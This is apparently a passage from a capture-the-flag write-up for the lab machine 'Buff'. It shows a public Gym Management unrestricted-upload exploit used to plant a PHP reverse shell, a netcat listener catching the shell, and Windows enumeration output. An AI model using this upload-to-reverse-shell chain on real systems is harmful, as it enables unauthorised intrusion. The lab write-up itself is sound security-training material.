3 :80

Using https://github.com/ssMMiles/gym-management-unrestricted-upload

$ cp /opt/php-reverse-shell/src/php_reverse_shell.php shell.php

$ python exploit.py -t 10.10.10.198:8080 -f shell.php
Uploading shell.php to 10.10.10.198:8080/up.php...
You can now access this file at http://10.10.10.198:8080/shell.php !

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...

Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
buff\shaun

whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

systeminfo
Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
System Type:               x64-based PC
Hotfix(s):                 N/A

Last updated